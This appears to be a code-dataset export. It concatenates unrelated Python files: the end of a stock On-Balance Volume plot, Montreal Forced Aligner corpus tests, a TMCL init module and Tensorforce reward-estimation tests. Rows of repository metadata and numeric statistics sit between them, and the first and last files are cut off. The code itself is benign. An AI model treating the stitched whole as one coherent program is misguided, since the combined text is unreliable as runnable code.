plt.plot(df_stock.index, df_stock['4. close'].values, 'k', lw=2)  # intraday frames carry '4. close', not '5. adjusted close'
plt.title(f"On-Balance Volume (OBV) on {s_ticker}")
plt.xlim(df_stock.index[0], df_stock.index[-1])
plt.ylabel(f'Share Price ($)')
plt.grid(b=True, which='major', color='#666666', linestyle='-')
plt.minorticks_on()
plt.grid(b=True, which='minor', color='#999999', linestyle='-', alpha=0.2)
axVolume = axPrice.twinx()
plt.bar(df_stock.index, df_stock['5. volume'].values, color='k', alpha=0.8, width=.3)
plt.subplot(212)
plt.plot(df_ta.index, df_ta.values, 'b', lw=1)
plt.xlim(df_stock.index[0], df_stock.index[-1])
plt.legend([f'OBV'])
plt.xlabel('Time')
plt.grid(b=True, which='major', color='#666666', linestyle='-')
plt.minorticks_on()
plt.grid(b=True, which='minor', color='#999999', linestyle='-', alpha=0.2)
plt.show()
print("")
| 53.118343
| 126
| 0.576473
| 1,225
| 8,977
| 4.10449
| 0.162449
| 0.077963
| 0.057279
| 0.038186
| 0.788783
| 0.753779
| 0.753779
| 0.742442
| 0.742442
| 0.726929
| 0
| 0.033018
| 0.25777
| 8,977
| 168
| 127
| 53.434524
| 0.721597
| 0.040325
| 0
| 0.742647
| 0
| 0.014706
| 0.343794
| 0.020339
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014706
| false
| 0
| 0.036765
| 0
| 0.066176
| 0.029412
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b9741d025777f285c24df3d3b3df57b59900819a
| 17,508
|
py
|
Python
|
tests/test_corpus.py
|
erayee/Montreal-Forced-Aligner
|
becd3b316d1999212910b4d0976e8c0405241493
|
[
"MIT"
] | null | null | null |
tests/test_corpus.py
|
erayee/Montreal-Forced-Aligner
|
becd3b316d1999212910b4d0976e8c0405241493
|
[
"MIT"
] | null | null | null |
tests/test_corpus.py
|
erayee/Montreal-Forced-Aligner
|
becd3b316d1999212910b4d0976e8c0405241493
|
[
"MIT"
] | null | null | null |
import os
import shutil
import pytest
from montreal_forced_aligner.corpus import AlignableCorpus, TranscribeCorpus
from montreal_forced_aligner.corpus.base import get_wav_info, SoxError
from montreal_forced_aligner.dictionary import Dictionary
from montreal_forced_aligner.config.train_config import train_yaml_to_config
def test_mp3(mp3_test_path):
try:
info = get_wav_info(mp3_test_path)
except SoxError:
pytest.skip()
assert 'sox_string' in info
def test_add(basic_corpus_dir, generated_dir):
output_directory = os.path.join(generated_dir, 'basic')
if os.path.exists(output_directory):
shutil.rmtree(output_directory, ignore_errors=True)
c = AlignableCorpus(basic_corpus_dir, output_directory, use_mp=True)
assert 'test_add' not in c.utt_speak_mapping
c.add_utterance('test_add', 'new_speaker', 'test_add', 'blah blah', 'wav_path')
assert 'test_add' in c.utt_speak_mapping
assert c.speak_utt_mapping['new_speaker'] == ['test_add']
assert c.file_utt_mapping['test_add'] == ['test_add']
assert c.text_mapping['test_add'] == 'blah blah'
c.delete_utterance('test_add')
assert 'test_add' not in c.utt_speak_mapping
assert 'new_speaker' not in c.speak_utt_mapping
assert 'test_add' not in c.file_utt_mapping
assert 'test_add' not in c.text_mapping
def test_basic(basic_dict_path, basic_corpus_dir, generated_dir, default_feature_config):
output_directory = os.path.join(generated_dir, 'basic')
if os.path.exists(output_directory):
shutil.rmtree(output_directory, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, output_directory)
dictionary.write()
c = AlignableCorpus(basic_corpus_dir, output_directory, use_mp=True)
c.initialize_corpus(dictionary)
default_feature_config.generate_features(c)
assert c.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_basic_txt(basic_corpus_txt_dir, basic_dict_path, generated_dir, default_feature_config):
output_directory = os.path.join(generated_dir, 'basic')
if os.path.exists(output_directory):
shutil.rmtree(output_directory, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(generated_dir, 'basic'))
dictionary.write()
c = AlignableCorpus(basic_corpus_txt_dir, output_directory, use_mp=False)
print(c.no_transcription_files)
assert len(c.no_transcription_files) == 0
c.initialize_corpus(dictionary)
default_feature_config.generate_features(c)
assert c.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_alignable_from_temp(basic_corpus_txt_dir, basic_dict_path, generated_dir, default_feature_config):
dictionary = Dictionary(basic_dict_path, os.path.join(generated_dir, 'basic'))
dictionary.write()
output_directory = os.path.join(generated_dir, 'basic')
if os.path.exists(output_directory):
shutil.rmtree(output_directory, ignore_errors=True)
c = AlignableCorpus(basic_corpus_txt_dir, output_directory, use_mp=False)
assert len(c.no_transcription_files) == 0
c.initialize_corpus(dictionary)
default_feature_config.generate_features(c)
assert c.get_feat_dim(default_feature_config) == 39
c = AlignableCorpus(basic_corpus_txt_dir, output_directory, use_mp=False)
assert len(c.no_transcription_files) == 0
c.initialize_corpus(dictionary)
default_feature_config.generate_features(c)
assert c.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_transcribe_from_temp(basic_corpus_txt_dir, basic_dict_path, generated_dir, default_feature_config):
dictionary = Dictionary(basic_dict_path, os.path.join(generated_dir, 'basic'))
dictionary.write()
output_directory = os.path.join(generated_dir, 'basic')
if os.path.exists(output_directory):
shutil.rmtree(output_directory, ignore_errors=True)
c = TranscribeCorpus(basic_corpus_txt_dir, output_directory, use_mp=False)
c.initialize_corpus(dictionary)
default_feature_config.generate_features(c)
assert c.get_feat_dim(default_feature_config) == 39
c = TranscribeCorpus(basic_corpus_txt_dir, output_directory, use_mp=False)
c.initialize_corpus(dictionary)
default_feature_config.generate_features(c)
assert c.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_extra(sick_dict, extra_corpus_dir, generated_dir):
output_directory = os.path.join(generated_dir, 'extra')
if os.path.exists(output_directory):
shutil.rmtree(output_directory, ignore_errors=True)
corpus = AlignableCorpus(extra_corpus_dir, output_directory, num_jobs=2, use_mp=False)
corpus.initialize_corpus(sick_dict)
def test_stereo(basic_dict_path, stereo_corpus_dir, temp_dir, default_feature_config):
temp = os.path.join(temp_dir, 'stereo')
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(temp, 'basic'))
dictionary.write()
d = AlignableCorpus(stereo_corpus_dir, temp, use_mp=False)
d.initialize_corpus(dictionary)
default_feature_config.generate_features(d)
assert d.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_stereo_short_tg(basic_dict_path, stereo_corpus_short_tg_dir, temp_dir, default_feature_config):
temp = os.path.join(temp_dir, 'stereo_tg')
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(temp, 'basic'))
dictionary.write()
d = AlignableCorpus(stereo_corpus_short_tg_dir, temp, use_mp=False)
d.initialize_corpus(dictionary)
default_feature_config.generate_features(d)
assert d.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_flac(basic_dict_path, flac_corpus_dir, temp_dir, default_feature_config):
temp = os.path.join(temp_dir, 'flac')
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(temp, 'basic'))
dictionary.write()
d = AlignableCorpus(flac_corpus_dir, temp, use_mp=False)
d.initialize_corpus(dictionary)
default_feature_config.generate_features(d)
assert d.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_audio_directory(basic_dict_path, basic_split_dir, temp_dir, default_feature_config):
temp = os.path.join(temp_dir, 'audio_dir_test')
audio_dir, text_dir = basic_split_dir
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(temp, 'basic'))
dictionary.write()
d = AlignableCorpus(text_dir, temp, use_mp=False, audio_directory=audio_dir)
assert len(d.no_transcription_files) == 0
assert len(d.utt_wav_mapping) > 0
d.initialize_corpus(dictionary)
default_feature_config.generate_features(d)
assert d.get_feat_dim(default_feature_config) == 39
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(temp, 'basic'))
dictionary.write()
d = AlignableCorpus(text_dir, temp, use_mp=True, audio_directory=audio_dir)
assert len(d.no_transcription_files) == 0
assert len(d.utt_wav_mapping) > 0
d.initialize_corpus(dictionary)
default_feature_config.generate_features(d)
assert d.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_flac_mp(basic_dict_path, flac_corpus_dir, temp_dir, default_feature_config):
temp = os.path.join(temp_dir, 'flac')
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(temp, 'basic'))
dictionary.write()
d = AlignableCorpus(flac_corpus_dir, temp, use_mp=True)
d.initialize_corpus(dictionary)
default_feature_config.generate_features(d)
assert d.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_flac_tg(basic_dict_path, flac_tg_corpus_dir, temp_dir, default_feature_config):
temp = os.path.join(temp_dir, 'flac')
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(temp, 'basic'))
dictionary.write()
d = AlignableCorpus(flac_tg_corpus_dir, temp, use_mp=False)
d.initialize_corpus(dictionary)
default_feature_config.generate_features(d)
assert d.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_flac_tg_mp(basic_dict_path, flac_tg_corpus_dir, temp_dir, default_feature_config):
temp = os.path.join(temp_dir, 'flac')
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(temp, 'basic'))
dictionary.write()
d = AlignableCorpus(flac_tg_corpus_dir, temp, use_mp=True)
d.initialize_corpus(dictionary)
default_feature_config.generate_features(d)
assert d.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_flac_tg_transcribe(basic_dict_path, flac_tg_corpus_dir, temp_dir, default_feature_config):
temp = os.path.join(temp_dir, 'flac')
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(temp, 'basic'))
dictionary.write()
d = TranscribeCorpus(flac_tg_corpus_dir, temp, use_mp=False)
d.initialize_corpus(dictionary)
default_feature_config.generate_features(d)
assert d.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(temp, 'basic'))
dictionary.write()
d = TranscribeCorpus(flac_tg_corpus_dir, temp, use_mp=True)
d.initialize_corpus(dictionary)
default_feature_config.generate_features(d)
assert d.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_flac_transcribe(basic_dict_path, flac_transcribe_corpus_dir, temp_dir, default_feature_config):
temp = os.path.join(temp_dir, 'flac')
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(temp, 'basic'))
dictionary.write()
d = TranscribeCorpus(flac_transcribe_corpus_dir, temp, use_mp=True)
d.initialize_corpus(dictionary)
default_feature_config.generate_features(d)
assert d.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(temp, 'basic'))
dictionary.write()
d = TranscribeCorpus(flac_transcribe_corpus_dir, temp, use_mp=False)
d.initialize_corpus(dictionary)
default_feature_config.generate_features(d)
assert d.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_24bit_wav(transcribe_corpus_24bit_dir, temp_dir, default_feature_config):
temp = os.path.join(temp_dir, '24bit')
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
c = TranscribeCorpus(transcribe_corpus_24bit_dir, temp, use_mp=False)
assert len(c.unsupported_bit_depths) == 0
c.initialize_corpus()
default_feature_config.generate_features(c)
assert c.get_feat_dim(default_feature_config) == 39
assert len(c.utt_wav_mapping) == 2
def test_short_segments(basic_dict_path, shortsegments_corpus_dir, temp_dir, default_feature_config):
temp = os.path.join(temp_dir, 'short_segments')
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, temp)
dictionary.write()
corpus = AlignableCorpus(shortsegments_corpus_dir, temp, use_mp=False)
corpus.initialize_corpus(dictionary)
default_feature_config.generate_features(corpus)
assert len(corpus.feat_mapping.keys()) == 1
assert len(corpus.utt_speak_mapping.keys()) == 3
assert len(corpus.speak_utt_mapping.keys()) == 1
assert len(corpus.text_mapping.keys()) == 3
assert len(corpus.utt_wav_mapping.keys()) == 1
assert len(corpus.segments.keys()) == 3
print(corpus.segments)
print(corpus.ignored_utterances)
assert len(corpus.ignored_utterances) == 2
dictionary.cleanup_logger()
def test_speaker_groupings(large_prosodylab_format_directory, temp_dir, large_dataset_dictionary, default_feature_config):
output_directory = os.path.join(temp_dir, 'large')
if os.path.exists(output_directory):
shutil.rmtree(output_directory, ignore_errors=True)
dictionary = Dictionary(large_dataset_dictionary, output_directory)
dictionary.write()
c = AlignableCorpus(large_prosodylab_format_directory, output_directory, use_mp=False)
c.initialize_corpus(dictionary)
default_feature_config.generate_features(c)
speakers = os.listdir(large_prosodylab_format_directory)
for s in speakers:
assert any(s in x for x in c.speaker_groups)
for root, dirs, files in os.walk(large_prosodylab_format_directory):
for f in files:
name, ext = os.path.splitext(f)
assert any(name in x for x in c.groups)
for root, dirs, files in os.walk(large_prosodylab_format_directory):
for f in files:
name, ext = os.path.splitext(f)
assert any(name in x for x in c.feat_mapping)
shutil.rmtree(output_directory, ignore_errors=True)
dictionary.write()
c = AlignableCorpus(large_prosodylab_format_directory, output_directory, num_jobs=2, use_mp=False)
c.initialize_corpus(dictionary)
default_feature_config.generate_features(c)
for s in speakers:
assert any(s in x for x in c.speaker_groups)
for root, dirs, files in os.walk(large_prosodylab_format_directory):
for f in files:
name, ext = os.path.splitext(f)
assert any(name in x for x in c.groups)
for root, dirs, files in os.walk(large_prosodylab_format_directory):
for f in files:
name, ext = os.path.splitext(f)
assert any(name in x for x in c.feat_mapping)
dictionary.cleanup_logger()
def test_subset(large_prosodylab_format_directory, temp_dir, large_dataset_dictionary, default_feature_config):
output_directory = os.path.join(temp_dir, 'large_subset')
shutil.rmtree(output_directory, ignore_errors=True)
dictionary = Dictionary(large_dataset_dictionary, output_directory)
dictionary.write()
c = AlignableCorpus(large_prosodylab_format_directory, output_directory, use_mp=False)
c.initialize_corpus(dictionary)
sd = c.split_directory()
default_feature_config.generate_features(c)
s = c.subset_directory(10, default_feature_config)
assert os.path.exists(sd)
assert os.path.exists(s)
dictionary.cleanup_logger()
def test_weird_words(weird_words_dir, temp_dir, sick_dict_path):
output_directory = os.path.join(temp_dir, 'weird_words')
shutil.rmtree(output_directory, ignore_errors=True)
dictionary = Dictionary(sick_dict_path, output_directory)
assert 'i’m' not in dictionary.words
assert '’m' not in dictionary.words
assert dictionary.words["i'm"][0]['pronunciation'] == ('ay', 'm', 'ih')
assert dictionary.words["i'm"][1]['pronunciation'] == ('ay', 'm')
assert dictionary.words["'m"][0]['pronunciation'] == ('m',)
dictionary.write()
c = AlignableCorpus(weird_words_dir, output_directory, use_mp=False)
c.initialize_corpus(dictionary)
print(c.utterance_oovs['weird-words'])
assert c.utterance_oovs['weird-words'] == ['talking-ajfish', 'asds-asda', 'sdasd-me']
dictionary.set_word_set(c.word_set)
for w in ["i'm", "this'm", "sdsdsds'm", "'m"]:
_ = dictionary.to_int(w)
print(dictionary.oovs_found)
assert "'m" not in dictionary.oovs_found
dictionary.cleanup_logger()
def test_punctuated(punctuated_dir, temp_dir, sick_dict_path):
output_directory = os.path.join(temp_dir, 'weird_words')
shutil.rmtree(output_directory, ignore_errors=True)
dictionary = Dictionary(sick_dict_path, output_directory)
dictionary.write()
c = AlignableCorpus(punctuated_dir, output_directory, use_mp=False)
c.initialize_corpus(dictionary)
print(c.text_mapping['punctuated'])
assert c.text_mapping['punctuated'] == 'oh yes they they you know they love her and so i mean'
dictionary.cleanup_logger()
def test_alternate_punctuation(punctuated_dir, temp_dir, sick_dict_path, different_punctuation_config):
train_config, align_config = train_yaml_to_config(different_punctuation_config)
output_directory = os.path.join(temp_dir, 'weird_words')
shutil.rmtree(output_directory, ignore_errors=True)
print(align_config.punctuation)
dictionary = Dictionary(sick_dict_path, output_directory, punctuation=align_config.punctuation)
dictionary.write()
c = AlignableCorpus(punctuated_dir, output_directory, use_mp=False, punctuation=align_config.punctuation)
print(c.punctuation)
c.initialize_corpus(dictionary)
print(c.text_mapping['punctuated'])
assert c.text_mapping['punctuated'] == 'oh yes, they they, you know, they love her and so i mean'
dictionary.cleanup_logger()
| 43.123153
| 122
| 0.75257
| 2,433
| 17,508
| 5.095356
| 0.066995
| 0.030975
| 0.096798
| 0.031621
| 0.85795
| 0.817214
| 0.788739
| 0.78156
| 0.762201
| 0.756715
| 0
| 0.004821
| 0.146904
| 17,508
| 406
| 123
| 43.123153
| 0.825187
| 0
| 0
| 0.669591
| 0
| 0
| 0.038666
| 0
| 0
| 0
| 0
| 0
| 0.181287
| 1
| 0.067251
| false
| 0
| 0.020468
| 0
| 0.087719
| 0.026316
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b9a8111ecf1843f817957335691cb6b160c3164e
| 177
|
py
|
Python
|
TMCL/__init__.py
|
NativeDesign/python-tmcl
|
7d79359274ef7e59ca561a1bf474e94bfdc5973c
|
[
"MIT"
] | 13
|
2017-07-14T07:51:19.000Z
|
2021-06-14T10:18:17.000Z
|
TMCL/__init__.py
|
NativeDesign/python-tmcl
|
7d79359274ef7e59ca561a1bf474e94bfdc5973c
|
[
"MIT"
] | 16
|
2017-07-18T09:13:34.000Z
|
2022-01-15T07:39:56.000Z
|
TMCL/__init__.py
|
NativeDesign/python-tmcl
|
7d79359274ef7e59ca561a1bf474e94bfdc5973c
|
[
"MIT"
] | 10
|
2017-01-10T17:43:48.000Z
|
2022-03-30T11:44:56.000Z
|
from .bus import Bus
from .motor import Motor
from .commands import Command
from .reply import Reply
def connect(serial_port, CAN=False):
return Bus(serial_port, CAN)
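A hypothetical connection sketch; the device path is a made-up example, and it assumes Bus accepts an open pyserial port (the Bus constructor itself is not shown here):

from serial import Serial

serial_port = Serial('/dev/ttyACM0')  # hypothetical device path
bus = connect(serial_port)            # wraps the port in a TMCL Bus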
| 22.125
| 41
| 0.751412
| 27
| 177
| 4.851852
| 0.518519
| 0.152672
| 0.198473
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.180791
| 177
| 7
| 42
| 25.285714
| 0.903448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.666667
| 0.166667
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
b9afe7b6c36b45ebaece996725ec7dd69464be30
| 63
|
py
|
Python
|
signal_logger_ui/test/test_signal_logger_ui.py
|
mcx/signal_logger
|
7d209bb42ae563fe78175f4b52a8f5c648984a39
|
[
"BSD-3-Clause"
] | null | null | null |
signal_logger_ui/test/test_signal_logger_ui.py
|
mcx/signal_logger
|
7d209bb42ae563fe78175f4b52a8f5c648984a39
|
[
"BSD-3-Clause"
] | 4
|
2019-07-09T08:49:38.000Z
|
2021-09-13T11:26:02.000Z
|
signal_logger_ui/test/test_signal_logger_ui.py
|
mcx/signal_logger
|
7d209bb42ae563fe78175f4b52a8f5c648984a39
|
[
"BSD-3-Clause"
] | 3
|
2020-05-28T08:50:03.000Z
|
2022-03-27T12:54:55.000Z
|
import signal_logger_ui
def test_placeholder():
assert True
| 15.75
| 23
| 0.809524
| 9
| 63
| 5.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 63
| 4
| 24
| 15.75
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b9dc0df31309f5eb24cb2c055d9194cf73ff1aa4
| 13,013
|
py
|
Python
|
test/test_reward_estimation.py
|
BaiLiping/BLPtensorforce
|
01bc0b7130a497c9dfff9caa2fd5df919ffe7552
|
[
"Apache-2.0"
] | 1
|
2021-12-25T16:54:16.000Z
|
2021-12-25T16:54:16.000Z
|
test/test_reward_estimation.py
|
BaiLiping/BLPtensorforce
|
01bc0b7130a497c9dfff9caa2fd5df919ffe7552
|
[
"Apache-2.0"
] | null | null | null |
test/test_reward_estimation.py
|
BaiLiping/BLPtensorforce
|
01bc0b7130a497c9dfff9caa2fd5df919ffe7552
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import unittest
from test.unittest_base import UnittestBase
class TestRewardEstimation(UnittestBase, unittest.TestCase):
agent = dict(
policy=dict(network=dict(type='auto', size=8, depth=1, rnn=2), distributions=dict(
int_action2=dict(type='categorical', temperature_mode='predicted'),
int_action3=dict(type='categorical', temperature_mode='global'),
gaussian_action2=dict(type='gaussian', stddev_mode='global'),
gaussian_action3=dict(
type='gaussian', stddev_mode='global', bounded_transform='clipping'
), beta_action='beta'
)), update=4, optimizer=dict(optimizer='adam', learning_rate=1e-3),
objective='policy_gradient', reward_estimation=dict(
horizon=3, estimate_advantage=True, predict_horizon_values='late',
return_processing=dict(type='clipping', lower=-1.0, upper=1.0),
advantage_processing='batch_normalization'
), l2_regularization=0.01, entropy_regularization=0.01,
state_preprocessing='linear_normalization',
reward_preprocessing=dict(type='clipping', lower=-1.0, upper=1.0),
exploration=0.01, variable_noise=0.01,
config=dict(device='CPU', eager_mode=True, create_debug_assertions=True, tf_log_level=20),
tracking='all'
)
def test_no_horizon_estimate(self):
self.start_tests(name='no horizon estimate')
# shortest horizon
reward_estimation = dict(
horizon=1, discount=0.99, predict_horizon_values=False,
return_processing='batch_normalization'
)
self.unittest(reward_estimation=reward_estimation)
# horizon as long as episode
reward_estimation = dict(
horizon=10, discount=0.99, predict_horizon_values=False,
return_processing='batch_normalization'
)
self.unittest(reward_estimation=reward_estimation)
# episode horizon
reward_estimation = dict(
horizon='episode', discount=0.99, predict_horizon_values=False,
return_processing='batch_normalization'
)
self.unittest(reward_estimation=reward_estimation)
def test_early_horizon_estimate(self):
self.start_tests(name='early horizon estimate')
# TODO: action value doesn't exist for Beta
actions = dict(
bool_action=dict(type='bool', shape=(1,)),
int_action1=dict(type='int', shape=(), num_values=4),
int_action2=dict(type='int', shape=(2,), num_values=3),
int_action3=dict(type='int', shape=(2, 1), num_values=2),
gaussian_action1=dict(type='float', shape=(1, 2), min_value=1.0, max_value=2.0),
gaussian_action2=dict(type='float', shape=(1,), min_value=-2.0, max_value=1.0)
)
reward_estimation = dict(
horizon='episode', predict_horizon_values='early', predict_action_values=True,
return_processing='batch_normalization'
)
# Implicit baseline = policy
self.unittest(actions=actions, reward_estimation=reward_estimation, config=dict(
buffer_observe=3, device='CPU', eager_mode=True, create_debug_assertions=True,
tf_log_level=20
))
# TODO: action value doesn't exist for Beta
actions = dict(
bool_action=dict(type='bool', shape=(1,)),
int_action1=dict(type='int', shape=(), num_values=4),
int_action2=dict(type='int', shape=(2,), num_values=3),
int_action3=dict(type='int', shape=(2, 1), num_values=2),
gaussian_action1=dict(type='float', shape=(1, 2), min_value=1.0, max_value=2.0),
gaussian_action2=dict(type='float', shape=(1,), min_value=-2.0, max_value=1.0)
)
update = dict(unit='episodes', batch_size=1)
reward_estimation = dict(
horizon=3, predict_horizon_values='early', return_processing='batch_normalization'
)
# Implicit baseline = policy
baseline_optimizer = dict(optimizer='adam', learning_rate=1e-3)
baseline_objective = 'state_value'
self.unittest(
actions=actions, update=update, reward_estimation=reward_estimation,
baseline_optimizer=baseline_optimizer, baseline_objective=baseline_objective,
config=dict(
buffer_observe='episode', device='CPU', eager_mode=True,
create_debug_assertions=True, tf_log_level=20
) # or 1?
)
reward_estimation = dict(
horizon='episode', predict_horizon_values='early', predict_terminal_values=True,
return_processing='batch_normalization'
)
# TODO: baseline horizon has to be equal to policy horizon
baseline = dict(network=dict(type='auto', size=7, depth=1, rnn=2))
# Implicit baseline_optimizer = 1.0
baseline_objective = 'state_value'
self.unittest(
reward_estimation=reward_estimation, baseline=baseline,
baseline_objective=baseline_objective
)
# Action-value baseline compatible with discrete actions
actions = dict(
bool_action=dict(type='bool', shape=(1,)),
int_action1=dict(type='int', shape=(), num_values=4),
int_action2=dict(type='int', shape=(2,), num_values=3),
int_action3=dict(type='int', shape=(2, 1), num_values=2)
)
reward_estimation = dict(
horizon=3, predict_horizon_values='early', predict_action_values=True,
predict_terminal_values=True, return_processing='batch_normalization'
)
baseline = dict(network=dict(type='auto', size=7, depth=1, rnn=1))
baseline_optimizer = dict(optimizer='adam', learning_rate=1e-3)
baseline_objective = 'action_value'
self.unittest(
actions=actions, reward_estimation=reward_estimation, baseline=baseline,
baseline_optimizer=baseline_optimizer, baseline_objective=baseline_objective
)
def test_late_horizon_estimate(self):
self.start_tests(name='late horizon estimate')
# TODO: action value doesn't exist for Beta
actions = dict(
bool_action=dict(type='bool', shape=(1,)),
int_action1=dict(type='int', shape=(), num_values=4),
int_action2=dict(type='int', shape=(2,), num_values=3),
int_action3=dict(type='int', shape=(2, 1), num_values=2),
gaussian_action1=dict(type='float', shape=(1, 2), min_value=1.0, max_value=2.0),
gaussian_action2=dict(type='float', shape=(1,), min_value=-2.0, max_value=1.0)
)
reward_estimation = dict(
horizon=3, predict_horizon_values='late', return_processing='batch_normalization'
)
# Implicit baseline = policy
# Implicit baseline_optimizer = 1.0
baseline_objective = 'state_value'
self.unittest(
actions=actions, reward_estimation=reward_estimation,
baseline_objective=baseline_objective
)
# Action-value baseline compatible with discrete actions
actions = dict(
bool_action=dict(type='bool', shape=(1,)),
int_action1=dict(type='int', shape=(), num_values=4),
int_action2=dict(type='int', shape=(2,), num_values=3),
int_action3=dict(type='int', shape=(2, 1), num_values=2)
)
reward_estimation = dict(
horizon=3, predict_horizon_values='late', predict_action_values=True,
return_processing='batch_normalization'
)
# TODO: baseline horizon has to be equal to policy horizon
baseline = dict(network=dict(type='auto', size=7, depth=1, rnn=2))
baseline_optimizer = 2.0
baseline_objective = 'action_value'
self.unittest(
actions=actions, reward_estimation=reward_estimation, baseline=baseline,
baseline_optimizer=baseline_optimizer, baseline_objective=baseline_objective
)
# TODO: state value doesn't exist for Beta
actions = dict(
bool_action=dict(type='bool', shape=(1,)),
int_action1=dict(type='int', shape=(), num_values=4),
int_action2=dict(type='int', shape=(2,), num_values=3),
int_action3=dict(type='int', shape=(2, 1), num_values=2),
gaussian_action1=dict(type='float', shape=(1, 2), min_value=1.0, max_value=2.0),
gaussian_action2=dict(type='float', shape=(1,), min_value=-2.0, max_value=1.0)
)
reward_estimation = dict(
horizon=3, predict_horizon_values='late', predict_terminal_values=True,
return_processing='batch_normalization'
)
# Implicit baseline = policy
baseline_optimizer = dict(optimizer='adam', learning_rate=1e-3)
baseline_objective = 'state_value'
self.unittest(
actions=actions, reward_estimation=reward_estimation,
baseline_optimizer=baseline_optimizer, baseline_objective=baseline_objective
)
reward_estimation = dict(
horizon=3, predict_horizon_values='late', predict_action_values=True,
predict_terminal_values=True, return_processing='batch_normalization'
)
# TODO: baseline horizon has to be equal to policy horizon
# (Not specifying customized distributions since action value doesn't exist for Beta)
baseline = dict(
type='parametrized_distributions', network=dict(type='auto', size=7, depth=1, rnn=2)
)
baseline_optimizer = dict(optimizer='adam', learning_rate=1e-3)
baseline_objective = 'action_value'
self.unittest(
reward_estimation=reward_estimation, baseline=baseline,
baseline_optimizer=baseline_optimizer, baseline_objective=baseline_objective
)
def test_advantage_estimate(self):
self.start_tests(name='advantage estimate')
reward_estimation = dict(
horizon=3, estimate_advantage=True, predict_horizon_values=False,
return_processing=dict(type='clipping', lower=-1.0, upper=1.0),
advantage_processing='batch_normalization'
)
# TODO: baseline horizon has to be equal to policy horizon
baseline = dict(network=dict(type='auto', size=7, depth=1, rnn=2))
# Implicit advantage computation as part of loss
